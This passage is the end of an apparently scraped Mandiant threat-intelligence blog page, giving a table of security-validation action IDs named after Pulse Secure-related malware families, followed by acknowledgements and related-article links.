style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003e\u003cstrong\u003eVID\u003c/strong\u003e\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003e\u003cstrong\u003eTitle\u003c/strong\u003e\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-596\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-597\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant #2\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-598\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant #3\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-599\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant #4\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-600\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant #5\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-601\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant #6\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-602\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLOWPULSE, Download, Variant #7\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-604\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - Pulse Secure Vulnerability, Utility, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-605\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - RADIALPULSE, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-606\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - PULSEJUMP, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-607\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - HARDPULSE, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-608\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLIGHTPULSE, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-609\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - LOCKPICK, Patcher, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-610\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - LOCKPICK, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-611\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - ATRIUM, Patcher, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-612\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - PACEMAKER, Launcher, Download, Variant #1\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-613\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - PACEMAKER, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-614\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - QUIETPULSE Utility, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-615\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - QUIETPULSE, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-616\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - STEADYPULSE, Download, Variant #2\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-617\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - STEADYPULSE, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-618\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - ATRIUM, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-619\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - THINBLOOD, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-620\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - THINBLOOD, Download, Variant #2\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-621\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - PULSECHECK, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-622\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - PULSECHECK, Download, Variant #2\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA104-757\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eHost CLI - QUIETPULSE Utility, Check, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA104-758\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eHost CLI - QUIETPULSE Utility, Check, Variant #2\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA104-759\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eHost CLI - QUIETPULSE Utility, Check, Variant #3\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA104-760\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eHost CLI - QUIETPULSE Utility, Check, Variant #4\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003ch4\u003eAcknowledgements\u003c/h4\u003e\n\u003cp\u003eMandiant would like to thank the Stroz Friedberg DFIR and Security Testing teams for their collaboration with the analysis and research. The team would also like to thank Joshua Villanueva, Regina Elwell, Jonathan Lepore, Dimiter Andonov, Josh Triplett, Jacob Thompson and\u00a0Michael Dockry for their hard work in analysis and blog content.\u003c/p\u003e"]]]],[["Threat Intelligence","Seeing Through a GLASSBRIDGE: Understanding the Digital Marketing Ecosystem Spreading Pro-PRC Influence Operations","GLASSBRIDGE is an umbrella group of four different companies that operate networks of inauthentic news sites and newswire services.",["https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-400x400.png 324w, https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png 648w"," 324px, 648px","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png"],null,6,null,"https://cloud.google.com/blog/topics/threat-intelligence/glassbridge-pro-prc-influence-operations",null,1,[["Google Threat Intelligence Group "]],null,"55620"],["Threat Intelligence","Empowering Gemini for Malware Analysis with Code Interpreter and Google Threat Intelligence","When used for malware analysis, Gemini now has capabilities to address obfuscation, and obtain insights on IOCs.",["https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-400x400.png 324w, https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png 648w"," 324px, 648px","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png"],null,6,null,"https://cloud.google.com/blog/topics/threat-intelligence/gemini-malware-analysis-code-interpreter-threat-intelligence",null,1,[["Bernardo Quintero"],["Andr\u00e9s Ram\u00edrez"]],null,"55597"],["Threat Intelligence","Pirates in the Data Sea: AI Enhancing Your Adversarial Emulation","Learn how Mandiant Red Team is using Gemini and LLMs for adversarial emulation and defense.",["https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-400x400.png 324w, https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png 648w"," 324px, 648px","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png"],null,25,null,"https://cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-adversarial-emulation",null,1,[["Mandiant "]],null,"55578"],["Threat Intelligence","Emerging Threats: Cybersecurity Forecast 2025","The Cybersecurity Forecast 2025 is here to arm security professionals with knowledge about the year ahead.",["https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-400x400.png 324w, https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png 648w"," 324px, 648px","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png"],null,3,null,"https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-forecast-2025",null,1,[["Adam Greenberg","Content Marketing Manager, Mandiant"]],null,"55565"]],null,"Threat Intelligence",null,[["Threat Intelligence","https://cloud.google.com/blog/topics/threat-intelligence","threat-intelligence"],["Security \u0026 Identity","https://cloud.google.com/blog/products/identity-security","identity-security"]],null,null,31], sideChannel: {}});</script><script id="wiz_jd" nonce="-49Bz_4wsckd3k4vDG-wCQ">if (window['_wjdc']) {const wjd = {}; window['_wjdc'](wjd); delete window['_wjdc'];}</script><script aria-hidden="true" id="WIZ-footer" nonce="-49Bz_4wsckd3k4vDG-wCQ">window.wiz_progress&&window.wiz_progress(); window.stopScanForCss&&window.stopScanForCss(); ccTick('bl');</script></body></html><footer id="ZCHFDb"><footer class="nRhiJb-RWrDld nRhiJb-yePe5c QJnbF" jscontroller="NsSboe" track-metadata-module="footer"><h3 class="nRhiJb-VqCwd-L6cTce">Footer Links</h3><section class="nRhiJb-haF9Wb r2W5Od"><section class="nRhiJb-DX2B6"><div class="nRhiJb-j5y3u"><h4 class="nRhiJb-BkAck nRhiJb-BkAck-OWXEXe-TzA9Ye">Follow us</h4><ul class="nRhiJb-Qijihe c3Uqdd" role="list"><li class="nRhiJb-KKXgde"><a class="nRhiJb-ARYxNe" href="https://www.x.com/googlecloud" target="_blank" rel="noopener" track-name="x"track-type="social link"track-metadata-position="footer"track-metadata-eventdetail="www.x.com/googlecloud"track-metadata-module="footer"track-metadata-module_headline="follow us"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-xgZe3c nRhiJb-Bz112c-OWXEXe-DX2B6" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M13.9,10.5L21.1,2h-1.7l-6.3,7.4L8,2H2.2l7.6,11.1L2.2,22h1.7l6.7-7.8L16,22h5.8L13.9,10.5L13.9,10.5z M11.5,13.2l-0.8-1.1 L4.6,3.3h2.7l5,7.1l0.8,1.1l6.5,9.2h-2.7L11.5,13.2L11.5,13.2z"></path></svg></a></li><li class="nRhiJb-KKXgde"><a class="nRhiJb-ARYxNe" href="https://www.youtube.com/googlecloud" target="_blank" rel="noopener" track-name="youtube"track-type="social link"track-metadata-position="footer"track-metadata-eventdetail="www.youtube.com/googlecloud"track-metadata-module="footer"track-metadata-module_headline="follow us"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-xgZe3c nRhiJb-Bz112c-OWXEXe-DX2B6" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M23.74 7.1s-.23-1.65-.95-2.37c-.91-.96-1.93-.96-2.4-1.02C17.04 3.47 12 3.5 12 3.5s-5.02-.03-8.37.21c-.46.06-1.48.06-2.39 1.02C.52 5.45.28 7.1.28 7.1S.04 9.05 0 10.98V13c.04 1.94.28 3.87.28 3.87s.24 1.65.96 2.38c.91.95 2.1.92 2.64 1.02 1.88.18 7.91.22 8.12.22 0 0 5.05.01 8.4-.23.46-.06 1.48-.06 2.39-1.02.72-.72.96-2.37.96-2.37s.24-1.94.25-3.87v-2.02c-.02-1.93-.26-3.88-.26-3.88zM9.57 15.5V8.49L16 12.13 9.57 15.5z"></path></svg></a></li><li class="nRhiJb-KKXgde"><a class="nRhiJb-ARYxNe" href="https://www.linkedin.com/showcase/google-cloud" target="_blank" rel="noopener" track-name="linkedin"track-type="social link"track-metadata-position="footer"track-metadata-eventdetail="www.linkedin.com/showcase/google-cloud"track-metadata-module="footer"track-metadata-module_headline="follow us"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-xgZe3c nRhiJb-Bz112c-OWXEXe-DX2B6" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M20 2H4c-1.1 0-1.99.9-1.99 2L2 20c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V4c0-1.1-.9-2-2-2zM8 19H5v-9h3v9zM6.5 8.31c-1 0-1.81-.81-1.81-1.81S5.5 4.69 6.5 4.69s1.81.81 1.81 1.81S7.5 8.31 6.5 8.31zM19 19h-3v-5.3c0-.83-.67-1.5-1.5-1.5s-1.5.67-1.5 1.5V19h-3v-9h3v1.2c.52-.84 1.59-1.4 2.5-1.4 1.93 0 3.5 1.57 3.5 3.5V19z"></path></svg></a></li><li class="nRhiJb-KKXgde"><a class="nRhiJb-ARYxNe" href="https://www.instagram.com/googlecloud/" target="_blank" rel="noopener" track-name="instagram"track-type="social link"track-metadata-position="footer"track-metadata-eventdetail="www.instagram.com/googlecloud/"track-metadata-module="footer"track-metadata-module_headline="follow us"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-xgZe3c nRhiJb-Bz112c-OWXEXe-DX2B6" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M12,0 C15.3,0 15.7,0 17,0 C18.3,0.1 19.1,0.3 19.9,0.6 C20.7,0.9 21.3,1.3 22,2 C22.7,2.7 23.1,3.4 23.3,4.2 C23.6,5 23.8,5.8 23.9,7.1 C24,8.3 24,8.7 24,12 C24,15.3 24,15.7 23.9,16.9 C23.8,18.2 23.6,19 23.3,19.8 C23,20.6 22.6,21.2 21.9,21.9 C21.3,22.6 20.6,23 19.8,23.3 C19,23.6 18.2,23.8 16.9,23.9 C15.7,24 15.3,24 12,24 C8.7,24 8.3,24 7,24 C5.7,23.9 4.9,23.7 4.1,23.4 C3.3,23.1 2.7,22.7 2,22 C1.3,21.3 0.9,20.6 0.7,19.8 C0.4,19 0.2,18.2 0.1,16.9 C0,15.7 0,15.3 0,12 C0,8.7 0,8.3 0.1,7.1 C0.1,5.8 0.3,4.9 0.6,4.1 C0.9,3.4 1.3,2.7 2,2 C2.7,1.3 3.4,0.9 4.1,0.6 C4.9,0.3 5.8,0.1 7.1,0.1 C8.3,0 8.7,0 12,0 Z M12,2.2 C8.8,2.2 8.4,2.2 7.2,2.2 C6,2.3 5.3,2.5 4.9,2.6 C4.4,2.9 4,3.1 3.5,3.5 C3.1,3.9 2.8,4.3 2.6,4.9 C2.5,5.3 2.3,6 2.3,7.2 C2.2,8.4 2.2,8.8 2.2,12 C2.2,15.2 2.2,15.5 2.3,16.8 C2.3,17.9 2.5,18.6 2.7,19 C2.9,19.6 3.2,20 3.6,20.4 C4,20.8 4.4,21.1 5,21.3 C5.4,21.5 6,21.6 7.2,21.7 C8.4,21.8 8.8,21.8 12,21.8 C15.2,21.8 15.5,21.8 16.8,21.7 C17.9,21.7 18.6,21.5 19,21.3 C19.6,21.1 20,20.8 20.4,20.4 C20.8,20 21.1,19.6 21.3,19 C21.5,18.6 21.6,18 21.7,16.8 C21.8,15.6 21.8,15.2 21.8,12 C21.8,8.8 21.8,8.5 21.7,7.2 C21.7,6.1 21.5,5.4 21.3,5 C21.1,4.4 20.8,4 20.4,3.6 C20,3.2 19.6,2.9 19,2.7 C18.6,2.5 18,2.4 16.8,2.3 C15.6,2.2 15.2,2.2 12,2.2 Z M12,5.8 C15.4,5.8 18.2,8.6 18.2,12 C18.2,15.4 15.4,18.2 12,18.2 C8.6,18.2 5.8,15.4 5.8,12 C5.8,8.6 8.6,5.8 12,5.8 Z M12,16 C14.2,16 16,14.2 16,12 C16,9.8 14.2,8 12,8 C9.8,8 8,9.8 8,12 C8,14.2 9.8,16 12,16 Z M18.4,7 C17.6268014,7 17,6.37319865 17,5.6 C17,4.82680135 17.6268014,4.2 18.4,4.2 C19.1731986,4.2 19.8,4.82680135 19.8,5.6 C19.8,6.37319865 19.1731986,7 18.4,7 Z"></path></svg></a></li><li class="nRhiJb-KKXgde"><a class="nRhiJb-ARYxNe" href="https://www.facebook.com/googlecloud/" target="_blank" rel="noopener" track-name="facebook"track-type="social link"track-metadata-position="footer"track-metadata-eventdetail="www.facebook.com/googlecloud/"track-metadata-module="footer"track-metadata-module_headline="follow us"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-xgZe3c nRhiJb-Bz112c-OWXEXe-DX2B6" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M20 2H4c-1.1 0-1.99.9-1.99 2L2 20c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V4c0-1.1-.9-2-2-2zm-1 2v3h-2c-.55 0-1 .45-1 1v2h3v3h-3v7h-3v-7h-2v-3h2V7.5C13 5.57 14.57 4 16.5 4H19z"></path></svg></a></li></ul></div></section></section><section class="nRhiJb-hlZHHf rtKYfe"><div class="nRhiJb-vQnuyc UXgbsb"><a class="ZOs9zc" href="https://cloud.google.com/" title="Google Cloud" track-name="google"track-type="footer link"track-metadata-position="footer"track-metadata-eventdetail="cloud.google.com/"track-metadata-module="footer"><svg class="nRhiJb-vQnuyc-RJLb9c" viewBox="0 0 64 64" role="presentation" aria-hidden="true" width="40" height="40"><path d="M40.37 20.29L42.3333 20.3267L47.67 14.99L47.93 12.73C43.69 8.95667 38.11 6.66 32 6.66C20.9367 6.66 11.6067 14.1833 8.84 24.3833C9.42334 23.98 10.6667 24.28 10.6667 24.28L21.3333 22.5267C21.3333 22.5267 21.8867 21.62 22.1567 21.6767C24.5967 19.0067 28.1067 17.3267 32 17.3267C35.1667 17.3267 38.08 18.44 40.37 20.29Z" fill="#ea4335"/><path d="M55.1667 24.3967C53.93 19.8233 51.37 15.79 47.9267 12.7267L40.3667 20.2867C43.3933 22.7333 45.3333 26.4733 45.3333 30.66V31.9933C49.01 31.9933 52 34.9833 52 38.66C52 42.3367 49.01 45.3267 45.3333 45.3267H32L30.6667 46.6667V54.6667L32 55.9933H45.3333C54.89 55.9933 62.6667 48.2167 62.6667 38.66C62.6667 32.75 59.6933 27.5267 55.1667 24.3967Z" fill="#4285f4"/><path d="M18.6667 55.9933H31.99V45.3267H18.6667C17.6867 45.3267 16.76 45.11 15.92 44.7267L14 45.3167L8.66 50.6567L8.19334 52.46C11.1033 54.6733 14.7333 55.9933 18.6667 55.9933Z" fill="#34a853"/><path d="M18.6667 21.3267C9.11 21.3267 1.33334 29.1033 1.33334 38.66C1.33334 44.2867 4.03 49.2967 8.2 52.4633L15.93 44.7333C13.6167 43.6867 12 41.36 12 38.66C12 34.9833 14.99 31.9933 18.6667 31.9933C21.3667 31.9933 23.6933 33.61 24.74 35.9233L32.47 28.1933C29.3033 24.0233 24.2933 21.3267 18.6667 21.3267Z" fill="#fbbc05"/></svg></a></div><ul class="nRhiJb-hlZHHf-PLDbbf nRhiJb-di8rgd-ZGNLv AXb5J" role="list"><li class="glue-footer__global-links-list-item"><a class="nRhiJb-Fx4vi " href="https://cloud.google.com/" track-name="google cloud"track-type="footer link"track-metadata-position="footer"track-metadata-eventdetail="cloud.google.com/"track-metadata-module="footer">Google Cloud</a></li><li class="glue-footer__global-links-list-item"><a class="nRhiJb-Fx4vi " href="https://cloud.google.com/products/" track-name="google cloud products"track-type="footer link"track-metadata-position="footer"track-metadata-eventdetail="cloud.google.com/products/"track-metadata-module="footer">Google Cloud Products</a></li><li class="glue-footer__global-links-list-item"><a class="nRhiJb-Fx4vi " href="https://myaccount.google.com/privacypolicy?hl=en-US" target="_blank" track-name="privacy"track-type="footer link"track-metadata-position="footer"track-metadata-eventdetail="myaccount.google.com/privacypolicy?hl=en-US"track-metadata-module="footer">Privacy</a></li><li class="glue-footer__global-links-list-item"><a class="nRhiJb-Fx4vi " href="https://myaccount.google.com/termsofservice?hl=en-US" target="_blank" track-name="terms"track-type="footer link"track-metadata-position="footer"track-metadata-eventdetail="myaccount.google.com/termsofservice?hl=en-US"track-metadata-module="footer">Terms</a></li><li aria-hidden="true" class="glue-footer__global-links-list-item"><a aria-hidden="true" role="button" tabindex="0" class="nRhiJb-Fx4vi glue-footer__link glue-cookie-notification-bar-control" href="#" target="_blank" track-name="cookies management controls"track-type="footer link"track-metadata-position="footer"track-metadata-eventdetail="#"track-metadata-module="footer">Cookies management controls</a></li></ul><ul class="nRhiJb-hlZHHf-PLDbbf nRhiJb-hlZHHf-PLDbbf-OWXEXe-hOedQd nRhiJb-di8rgd-ZGNLv qkxr1" role="list"><li class="glue-footer__global-links-list-item nRhiJb-hlZHHf-PLDbbf-rymPhb-ibnC6b-OWXEXe-hOedQd"><a class="nRhiJb-Fx4vi" href="https://support.google.com" target="_blank" track-name="help"track-type="footer link"track-metadata-position="footer"track-metadata-eventdetail="support.google.com"track-metadata-module="footer"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-xgZe3c nRhiJb-Bz112c-OWXEXe-yePe5c-h9d3hd" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 17h-2v-2h2v2zm2.07-7.75l-.9.92C13.45 12.9 13 13.5 13 15h-2v-.5c0-1.1.45-2.1 1.17-2.83l1.24-1.26c.37-.36.59-.86.59-1.41 0-1.1-.9-2-2-2s-2 .9-2 2H8c0-2.21 1.79-4 4-4s4 1.79 4 4c0 .88-.36 1.68-.93 2.25z"></path></svg>Help</a></li><li class="glue-footer__global-links-list-item nRhiJb-hlZHHf-PLDbbf-rymPhb-ibnC6b-OWXEXe-hOedQd"><select jsaction="change:xU0iy" aria-label="Change language" class="nRhiJb-CL4aqd-j4gsHd"><option value="" selected disabled hidden>Language</option><option value="en" selected>‪English‬</option><option value="de">‪Deutsch‬</option><option value="fr">‪Français‬</option><option value="ko">‪한국어‬</option><option value="ja">‪日本語‬</option></select></li></ul></section></footer></footer>